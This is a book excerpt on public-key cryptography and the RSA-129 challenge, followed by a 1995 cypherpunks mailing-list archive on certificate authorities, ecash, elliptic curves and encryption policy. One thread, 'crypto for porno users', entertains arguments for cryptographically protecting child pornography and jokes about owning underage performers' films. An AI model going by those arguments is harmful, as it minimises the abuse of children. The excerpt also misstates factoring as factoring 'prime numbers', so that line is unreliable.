How big do the prime numbers and their products have to
be to ensure an effective one-way function?

The concept of public-key encryption was invented by
Whitfield Diffie and Martin Hellman in 1977. Another set
of computer scientists, Ron Rivest, Adi Shamir, and
Leonard Adelman, soon came up with the notion of using
prime factorization as part of what is now known as the
RSA cryptosystem, after the initials of their last names.
They projected that it would take millions of years to
factor a 130-digit number that was the product of two
primes, regardless of how much computing power was
brought to bear. To prove the point, they challenged the
world to find the two factors in this 129-digit number,
known to people in the field as RSA 129:

   114,381,625,757,888,867,669,235,779,976,146,612,010,
   218,296,721,242,362,562,561,842,935,706,935,245,733,
   897,830,597,123,563,958,705,058,989,075,147,599,290,
   026,879,543,541

They were sure that a message they had encrypted using
the number as the public key would be totally secure
forever. But they hadn't anticipated either the full
effects of Moore's Law, as discussed in chapter 2, which
has made computers much more powerful, or the success of
the personal computer, which has dramatically increased
the number of computers and computer users in the world.
In 1993 a group of more than 600 academics and hobbyists
from around the world began an assault on the 129-digit
number, using the Internet to coordinate the work of
various computers. In less than a year they factored the
number into two primes, one 64 digits long and the other
65. The primes are as follows:

   3,490,529,510,847,650,949,147,849,619,903,898,133,
   417,764,638,493,387,843,990,820,577

and

   32,769,132,993,266,709,549,961,988,190,834,461,413,
   177,642,967,992,942,539,798,288,533

And the encoded message says: "The magic words are
squeamish and ossifrage."

One lesson that came out of this challenge is that a
129-digit public key is not long enough if the
information being encrypted is really important and
sensitive. Another is that no one should get too cocksure
about the security of encryption.

Increasing the key just a few digits makes it much more
difficult to crack. Mathematicians today believe that a
250-digit-long product of two primes would take millions
of years to factor with any foreseeable amount of future
computing power. But who really knows? This uncertainty
-- and the unlikely but conceivable possibility that
someone could come up with an easy way of factoring big
numbers -- means that a software platform for the
information highway will have to be designed in such a
way that its encryption scheme can be changed readily.

One thing we don't have to worry about is running out of
prime numbers, or the prospect of two computers'
accidentally using the same numbers as keys. There are
far more prime numbers of appropriate length than there
are atoms in the universe, so the chance of an accidental
duplication is vanishingly small.

Key encryption allows more than just privacy. It can also
assure the authenticity of a document because a private
key can be used to encode a message that only the public
key can decode. It works like this: If I have information
I want to sign before sending it to you, my computer uses
my private key to encipher it. Now the message can be
read only if my public key -- which you and everyone else
knows -- is used to decipher it. This message is
verifiably from me, because no one else has the private
key that could have encrypted it in this way.

My computer takes this enciphered message and enciphers
it again, this time using your public key. Then it sends
this double-coded message to you across the information
highway.

Your computer receives the message and uses your private
key to decipher it. This removes the second level of
encoding but leaves the level I applied with my private
key. Then your computer uses my public key to decipher
the message again. Because it really is from me, the
message deciphers correctly and you know it is authentic.
If even one bit of information was changed, the message
would not decode properly and the tampering or
communications error would be apparent. This
extraordinary security will enable you to transact
business with strangers or even people you distrust,
because you'll be able to be sure that digital money is
valid and signatures and documents are provably
authentic.

Security can be increased further by having time stamps
incorporated into encrypted messages. If anyone tries to
tinker with the time that a document supposedly was
written or sent, the tinkering will be detectable. This
will rehabilitate the evidentiary value of photographs
and videos, which has been under assault because digital
retouching has become so easy to do.

My description of public-key encryption oversimplifies
the technical details of the system. For one thing,
because it is relatively slow, it will not be the only
form of encipherment used on the highway. But publickey
encryption will be the way that documents are signed,
authenticity is established, and the keys to other kinds
of encryption are distributed securely.


[Critical Issues, pp. 265-66, 270-71]

This versatility will be the strength of the network, but
it will also mean we will become reliant on it.

Reliance can be dangerous. During the New York City
blackouts in 1965 and 1977, millions of people were in
trouble -- at least for a few hours -- because of their
dependence on electricity. They counted on electric power
for light, heat, transport, and security. When
electricity failed, people were trapped in elevators,
traffic lights stopped working, and electric water pumps
quit. Anything really useful is missed when you lose it.

A complete failure of the information highway is worth
worrying about. Because the system will be thoroughly
decentralized, any single outage is unlikely to have a
widespread effect. If an individual server fails, it will
be replaced and its data restored. But the system could
be susceptible to assault. As the system becomes more
important, we will have to design in more redundancy. One
area of vulnerability is the system's reliance on
cryptography -- the mathematical locks that keep
information safe.

None of the protection systems that exist today, whether
steeringwheel locks or steel vaults, are completely
fail-safe. The best we can do is make it as difficult as
possible for somebody to break in. Despite popular
opinions to the contrary, computer security has a very
good record. Computers are capable of protecting
information in such a way that even the smartest hackers
can't get at it readily unless someone entrusted with
information makes a mistake. Sloppiness is the main
reason computer security gets breached. On the
information highway there will be mistakes, and too much
information will get passed along. Someone will issue
digital concert tickets that prove to be forgeable, and
too many people will show up. Whenever this sort of thing
happens, the system will have to be reworked and laws may
have to be revised.

Because both the system's privacy and the security of
digital money depend on encryption, a breakthrough in
mathematics or computer science that defeats the
cryptographic system could be a disaster. The obvious
mathematical breakthrough would be development of an easy
way to factor large prime numbers. Any person or
organization possessing this power could counterfeit
money, penetrate any personal, corporate, or governmental
file, and possibly even undermine the security of
nations, which is why we have to be so careful in
designing the system. We have to ensure that if any
particular encryption technique proves fallible, there is
a way to make an immediate transition to an alternate
technique. There's a little bit of inventing still to be
done before we have that perfected. It is particularly
hard to guarantee security for information you want kept
private for a decade or more.

[Good section on privacy protection elided]

At the same time technology is making it easier to create
video records, it is also making it possible to keep all
your personal documents and messages totally private.
Encryption-technology software, which anyone can download
from the Internet, can transform a PC into a virtually
unbreakable code machine. As the highway is deployed,
security services will be applied to all forms of digital
information -- phone calls, files, databases, you name
it. As long as you protect the password, the information
stored on your computer can be held under the strongest
lock and key that has ever existed. This allows for the
greatest degree of information privacy any individual has
ever had.

Many in government are opposed to this encryption
capability, because it reduces their ability to gather
information. Unfortunately for them, the technology can't
be stopped. The National Security Agency is a part of the
U.S. government defense and intelligence community that
protects this country's secret communications and
decrypts foreign communications to gather intelligence
data. The NSA does not want software containing advanced
encryption capabilities to be sent outside the United
States. However, this software is already available
throughout the world, and any computer can run it. No
policy decision will be able to restore the tapping
capabilities governments had in the past.

Today's legislation that prevents the export of software
with good encryption capability could harm U.S. software
and hardware companies. The restrictions give foreign
companies an advantage over U.S. competitors. American
companies almost unanimously agree that the current
encryption export restrictions don't work.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 25 Nov 1995 13:26:25 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <199511250514.QAA13966@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
  and moroni@scranton.com
  and cypherpunks@toad.com

Allen wrote:
> From: IN%"moroni@scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13
> 
> >I wish we could get off the subject of the kiddie porn , it makes
> >me wonder what people on this list are doing when they are not
...

I believe that the thread originally was on pornography in  
general, not any particulary type...

One reason to talk of it might be that users of legitimate pornography
(non-violent erotica, X, whatever you call it) are a likely adopter
of privacy technology (encryption, e cash, anon, etc).

They may also be a sufficiently numerous group to affect elections,
should one or the other party actually be better than the other.

Particularly in Australia, where I understand X-rated material
may be sold only in the Territories, and anyone living in one of
the States has to drive over or mail-order.

<offtopic>
...
> governmental censorship. Consequently, I would like to give two
> counterarguments to the idea that child pornography is not
> something that should be cryptographically protected.
... [age of consent; generated without children] ...

One can even imagine situations with real live child pornography...
Should one be forbidden from distributing pictures of oneself
when one was younger? 
</offtopic>

However, I speak from assumptions and newspaper reports, not
personal experience, so all of the above may be way off :-)

Adiau - Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLamJSxV6mvvBgf5AQGuagQAhGbN/16ALjnDKKJMlPpfbctBkXt7gpZl
zh+lx+w+u0jIYG6whmCwpPnSPpo1MjorHvhZ/5B/h+WonXYfSw+ZFo0ziOCtIh5S
L0Jyp2LnJaU4mqggVwqMfBVlQ31Ax3sSuxxxI2YhQygrx4BauPhHMnJJnDxs7Uj0
qKFVGTK53WI=
=m8px
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sun, 26 Nov 1995 08:22:08 +0800
To: cypherpunks@toad.com
Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy
Message-ID: <m0tJUWY-0008yoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>From: jimbell@pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
away with you tail between your legs!
>
>Stop being a wuss!  If you're as correct as  you claim you are, you have no
reason to fear.  Debate, dammit!
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sun, 26 Nov 1995 05:32:40 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



   I'm soory but I don't care if the images come from mars . Jerking off 
to the images of kids is sick.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 07:15:26 +0800
To: cypherpunks@toad.com
Subject: NOF_uss
Message-ID: <199511252301.SAA20824@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, Nov 17, 1995:

   "Security Schemes Aspire to No Fuss System Protection."

      Because of the painful trade offs between security and
      usability that come with current protective measures,
      computer scientists have heen investigating new ways to
      detect and ward off intruders that present fewer
      obstacles to users and administrators. Two of the most
      intriguing directions announced at the Baltimore
      security conference were reported by researchers at
      Purdue University's Computer Operations, Audit, and
      Security Technology laboratory (COAST). The first was an
      attempt to harness techniques from artificial
      intelligence to detect intrusions; the second, a pilot
      test of what has been called software forensics -- an
      effort to recognize malign programs by identifying the
      fingerprints of their creators.

   NOF_uss  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 07:14:35 +0800
To: cypherpunks@toad.com
Subject: SAC_lam
Message-ID: <199511252302.SAA20929@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-25-95. Washrag:

   "Hacking Away at the Internet's Web. Security Concerns Grow
   as Saboteurs Target On-Line Sites."

      Computer hackers are turning their unwelcome attentions
      to the World Wide Web. Web sites are among the easiest
      places on the Internet to disrupt and sabotage, experts
      say, in part because many of the people who set up such
      displays pay little attention to security. Such
      unprotected systems located outside of a secure network
      are often called "sacrificial lambs," noted a manager at
      Trusted Information Systems Inc.

   SAC_lam  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Sun, 26 Nov 1995 07:07:41 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks article in The Nando Times
Message-ID: <199511252256.PAA05780@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out

http://www.nando.net/newsroom/ntn/info//101095/info446_33.html

Its an article about the cypherpunks, mostly bullshit and hyperbole.  I
especially liked the parts about "Larry Detweiler" and this quote from Jim
Kallston, of the FBI: "We're not trying to stop technology," Kallston said.
"We're trying to collect information on criminals and terrorists and child
pornographers."  What happened to the fourth horseman Jim?
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 26 Nov 1995 10:26:44 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511252105.QAA08724@homeport.org>
Message-ID: <9511260216.AA23306@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> | C) Don't settle for less than X.509 ver 3, because this allows the 
> | certificate to carry within it a reference to the location of the CRL 
> | list.  Use that feature.
> 
> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

I don't believe that it does.

For those who missed it, the problem is that the encryptor in an
encrypt-before-signing protocol is able to use his knowledge of the
factorization of the encryption modulus to compute a discrete log, and
forge another message for which the signature is also valid (after
registering the new exponent).

   - Mark -



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aleph@toad.com
Date: Sun, 26 Nov 1995 10:42:47 +0800
Subject: No Subject
Message-ID: <9511260232.AA20127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From POP3@abaco.coastalnet.com. Sat Nov 25 21:32:39 1995
Return-Path: <dkincaid@home.dave.us>
Received: from home.dave.us (pm-nb1-49.coastalnet.com) by abaco.coastalnet.com (4.1/SMI-4.1)
	id AA03139; Sat, 25 Nov 95 21:30:20 EST
Resent-Date: Sat, 25 Nov 1995 00:02:29 -0600 (CST)
Resent-From: dkincaid@home.dave.us
Resent-Message-Id: <9511260230.AA03139@abaco.coastalnet.com>
Received: by home.dave.us id AA01530
  (5.67b/IDA-1.5 for cn1290@coastalnet.com); Sat, 25 Nov 1995 21:26:44 -0500
Resent-To: cn1290@coastalnet.com
Message-Id: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Precedence: bulk
Sender: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Date: Sat, 25 Nov 1995 00:02:29 -0600 (CST)

	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
of the respected member in the group such as Sammer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com
Date: Sun, 26 Nov 1995 10:41:05 +0800
Subject: No Subject
Message-ID: <9511260232.AB20127@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From POP3@abaco.coastalnet.com. Sat Nov 25 21:32:38 1995
Return-Path: <dkincaid@home.dave.us>
Received: from home.dave.us (pm-nb1-49.coastalnet.com) by abaco.coastalnet.com (4.1/SMI-4.1)
	id AA03138; Sat, 25 Nov 95 21:30:18 EST
Resent-Date: Sat, 25 Nov 1995 17:00:16 -0800
Resent-From: dkincaid@home.dave.us
Resent-Message-Id: <9511260230.AA03138@abaco.coastalnet.com>
Received: by home.dave.us id AA01536
  (5.67b/IDA-1.5 for cn1290@coastalnet.com); Sat, 25 Nov 1995 21:27:17 -0500
Resent-To: cn1290@coastalnet.com
Message-Id: <m0tJUWY-0008yoC@pacifier.com>
X-Sender: jimbell@pacifier.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Precedence: bulk
Sender: jimbell@pacifier.com (jim bell)
From: jimbell@pacifier.com (jim bell)
To: cypherpunks@toad.com
Cc: vznuri@netcom.com
Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
Date: Sat, 25 Nov 1995 17:00:16 -0800

The detweiler tentacle is afraid to debate me...


>To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>From: jimbell@pacifier.com (jim bell)
>Subject: Re: Gingrich, "crypto coalition" & dysfunctional philosophy 
>
>>well, I don't really care about convincing anarchists that you're
>>a bozo. it's reasonable people who it would scare me if they began
>>to take you seriously.
>
>Then start being "scared."  I guess you have lots of practice.
>
>> frankly I'm not convinced that anyone with
>>half a brain is taking you seriously.
>
>I don't have to convince you of anything!  You wimped out!  You claimed
that you would be happy to debate me IN PUBLIC!  Well, I did and you ran
away with you tail between your legs!
>
>Stop being a wuss!  If you're as correct as  you claim you are, you have no
reason to fear.  Debate, dammit!
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 25 Nov 1995 15:55:53 +0800
To: iang@cory.EECS.Berkeley.EDU (Ian Goldberg)
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511250744.SAA14637@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
  and cypherpunks@toad.com

...
> Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
> I have a binary, which I can't even run...).  
...

Sounds like good work!

...
> I guess the important bit is that the payee, the item being bought,
> and the cost are sent _in the clear_.  Some of the people I've talked
> to think this is a huge privacy breach, and some don't.  You all can
...

Yeah, it probably is. Then again you can probably use a dummy
description, no?

However, that doesn't get around the fact that anyone intercepting
the packet who knows where it came from will immediately see straight
through payer anonymity.

...
>    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> 	    the source?"
...

A Source Close To Digicash That Did Not Wish To Be Quoted
once described them as 'crown jewels' (competitive advantage).

ASCTDTDNWTBQ then appealed to Digicash's track record.

I certainly hope that this genuinely is not Digicash's official opinion.


Thank you for once again showing the futility of security by obscurity.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLbIjixV6mvvBgf5AQFKiwP/fJKIZnRM4HQzkdzYNTTDPP/CZNGlLWQI
UnA4la2134SoBde/hPsSiniuWBlESU8rpbA3IX+mygh50x/4CSb86VClvgIF8xKp
XFRwXljxer2dqKV3troMYFQfYWrUoj6NXTJIRQWwBJ6ilHcXE1OWtHWGPgAB9/Gv
79z3R4njwmw=
=OPp0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:17:42 +0800
To: cypherpunks@toad.com
Subject: Re: MIT Distribution Site (FTP) for PGP and Other Products *DOWN*
Message-ID: <acdd5fac0002100427f5@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <jis-2511951419240001@road-warrior.mit.edu>, jis@mit.edu
(Jeffrey I. Schiller) wrote:

> The anonymous FTP server running on net-dist.mit.edu (which is also
> bitsy.mit.edu) is currently down due to a failure of the disk drive
> that hosts the files. We expect to replace the disk this afternoon
> (Saturday) and begin restoral operational as soon as the new disk
> is cabled up.

Service is now restored (on a new disk).

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLeu8sUtR20Nv5BtAQGQGgP8CCm6SJdkxNAv125clOeWq/3VEFMBGgx7
GTpZIKcZutWSqBbC8ATUDoyqcIURR+xEUvKxegktauYkS+fdfHnqsD84OnA1lG2X
4bOwO8G9zA2Uy93lcVrM4WrAYE1J4hseiuhFK6T4kGbHek91ZU/dY5xGjgo+3Wrm
FeYXRwfujJY=
=hAXB
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 08:26:54 +0800
To: cypherpunks@toad.com
Subject: AI and Author-ID Security
Message-ID: <199511260016.TAA27186@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The AI and author-ID security programs covered in the Nov
   17 Science article are described in detail at:

   <http://www.cs.purdue.edu/coast/coast.html>


   Active Defense of a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of
      Computer Sciences, Purdue University; CSD-TR-95-008;
      1995.

   Defending a Computer System Using Autonomous Agents
      Mark Crosbie and E. H. Spafford; Department of Computer
      Sciences, Purdue University; CSD-TR-95-022; 1995.

   Authorship Analysis: Identifying the Author of a Program
      Ivan Krsul; Department of Computer Sciences, Purdue
      University; MS Thesis; CSD-TR-94-030; 1994.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 26 Nov 1995 08:53:27 +0800
To: moroni@scranton.com (Moroni)
Subject: Re: crypto for porno users
In-Reply-To: <Pine.LNX.3.91.951125171338.8831A-100000@prufrocks.scranton.com>
Message-ID: <199511260041.TAA08908@homeport.org>
MIME-Version: 1.0
Content-Type: text



Kids like Tracy Lords, who looked to be over 18 in all her movies?
(All of which are now illegal to own because she was under 18 when she
made them.)


Adam "Clearly a sicko who should be locked up for his own good."

Moroni wrote:

|    I'm soory but I don't care if the images come from mars . Jerking off 
| to the images of kids is sick.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 26 Nov 1995 03:03:26 +0800
To: perry@piermont.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <m0tJPeV-0002eCC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Perry" == Perry E Metzger <perry@piermont.com> writes:

    Perry> become a C.A. and to run one, and it turns out not to be
    Perry> particularly onerous, I or one of my corporate alter egos
    Perry> might be willing. I must say, though, that being an
    Perry> anti-fan of X.509 the situation would be ironic...

;).

Ten easy  steps to become a C.A.:

1. get a copy of SSLeay (try ftp://ftp.cert.dfn.de/pub/tools/net/ssleay)

2. install it

3. generate a key using 'genrsa -idea -rand
/dev/random:/var/adm/messages:/etc/utmp:/proc/net/dev -out
cypherpunks.key 1024'. Substitute a higher number than 1024 depending
on your paranoia. Choose an inconvenient pass phrase.

4. Use your favourite secret splitting method and send key and pass
phrase to respected members of the cypherpunks community.

5. Generate your X.509 certificate using makecert.

6. Sign other people's certificate using x509.

7.-10. Get yourself a decent beer and Applied Crytography 2nd Ed.

Sorry, I'd love to give you details for 5 and 6, but I'm out of
time. I'll deliver them tomorrow.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMLdlB0yjTSyISdw9AQEs5QP/T5K8qdD0lX9NrqsYxcudpUSPBoAOuzUb
oy2IllKpliviJaGZCb5o6ga1jgoCObyhe6HNaaQINOHhWyP09Gzs+jdNxMsqcK1z
Vxt9NOH+cHyBC67rPU77vDwB27dXNIob+u1KwKldWkSB3Id+qLR+Pz5yXylYAMhI
ccuVcA0BpOU=
=iGp+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@mediacity.com (Norman Hardy)
Date: Sun, 26 Nov 1995 13:58:57 +0800
To: cypherpunks@toad.com
Subject: Learning about Elliptic Curves
Message-ID: <acddae750002100481c8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crpto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i after 0 such that a_0 =
a_i. Knowing the period is tantamount to knowing the private key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 26 Nov 1995 16:46:58 +0800
To: cypherpunks@toad.com
Subject: [FYI] FBI Training Eastern European Police
Message-ID: <v03003e03acddb4a8d772@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


[ from: The Hungary Report #1.28, free weekly, direct from Budapest ]
[ retransmitted to list without permission to increase distribution ]

  FBI School Teaches New Tricks to Old Enemies

  By Susan Milligan   Copyright (c) 1995

  In matching navy blue polo shirts, the students sat transfixed as
  they watched slides showing the destruction of the Oklahoma City and
  World Trade Center bombings.

  "God forbid you should ever have anything like this happen over
  here," American instructor Ed Burwitz told his Central European
  class, outfitted with headphones for simultaneous translation of the
  lecture. "It is a tough task for any
  freedom-loving country to prevent terrorism," he added.

  The class on forensics is typical of what goes on in law enforcement
  academies across America. But in this classroom, the instructors are
  teaching crime-fighting tactics to students from onetime enemy
  nations.

  "This could not have happened five years ago," said Laszlo Simon, the
  Hungarian director of the International Law Enforcement Academy here.
  "We don't preach or teach," said Leslie Kaciban, the American
  director of the newly-opened facility. Instead, the American
  instructors - culled from the FBI and other law enforcement agencies
  - share information and experiences with the students for them to
  adapt to their systems.

  Students from Hungary, Russia, Poland, the Czech Republic and other
  Central and Eastern European nations attend ILEA's 8-week sessions,
  the first of which began in April.

  The United States fronted $2.5 million to renovate the campus, which
  includes a brand-new gym, classrooms, dormitories and one of
  Hungary's few indoor tennis courts. The Hungarian government
  contributed $500,000 to renovate the facility,
  but the U.S. will pay the $3.5 million yearly cost to operate the
  center, which is modeled after the law enforcement training center in
  Quantico, Va.

  The facility looks like any other college campus - students go on
  field trips together, take "wellness" physical fitness class
  together, and will have a yearbook and alumni newsletter.
  The idea is to help the Eastern Europeans with their burgeoning
  crimes problems, as well as to foster cooperation on international
  crime problems.

  "I'm amazed at the freedom of travel that is possible" after the
  opening up of the Eastern nations, Burwitz said. But "that means
  criminals can travel as well," he said, allowing them to traffic
  drugs and contraband. "The more interaction we have with these
  countries in law enforcement, the better it will be for emerging
  democracies," Kaciban said.

  Class topics range from "human dignity" - how to treat a crime
  suspect - to undercover operations and fraud. April's bombing of the
  federal building in Oklahoma City is being used as an example in
  several classes.

  In "crisis management," students will learn "how to contain it (a
  crisis) and keep it from erupting," said instructor Stephen Brooks,
  who helped handle the Oklahoma City bombing. Big-scale bombings are
  not common to this part of the world, students said. But they said
  they learned a lot about how to fight organized crime, which is
  mushrooming in the aftermath of the fall of communism. "They told
  they have a lot of problems (with organized crime), and that it's
  better if we learn from their mistakes," said Hungarian student
  Vilmos Szeplaki.

  Organized crime is doubly damaging to the emerging nations, because
  it undermines their economies, Kaciban said. Investors are naturally
  reluctant to dump money into a nation if they believe there is
  rampant corruption. Some teachings do not translate for the European
  students. For example, there is no Russian RICO - the Racketeer
  Influenced and Corrupt Organizations Act that is one of the strongest
  American legal tools against organized crime.

  Eastern European crime syndicates tend not to be based in crime
  families, instructors said. And organized crime in Russia and Ukraine
  is so much a part of the society, that it's hard to stop it, said Amy
  O'Neil, a State Department official not involved in the ILEA. "Under
  the communist system, you basically did what you could get away with.
  Everyone broke laws," O'Neil said. "That's how you survived."

  Both students and teachers said there was a remarkable similarity,
  however, in the use of evidence and investigatory tools among the
  countries. Eastern Europeans are very familiar with the use of DNA
  testing, for example, to identify suspects, although they don't
  always have the money to do it, Burwitzsaid."There are different
  orders of laws between the U.S. and here," said a Czech student who
  would identify himself only as Milan. "But essentially, we have the
  same methods of investigation."

                                                * * *
  Susan Milligan <susan.milligan@magnet.hu> is a free-lance writer and
  stringer for the Boston Globe, the San Francisco Examiner, Business
  Central Europe and Hollywood Reporter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 26 Nov 1995 14:24:00 +0800
To: moroni@scranton.com
Subject: Re: crypto for porno users
Message-ID: <01HY2X8H88VK8WYKBT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"moroni@scranton.com"  "Moroni" 25-NOV-1995 16:21:44.10

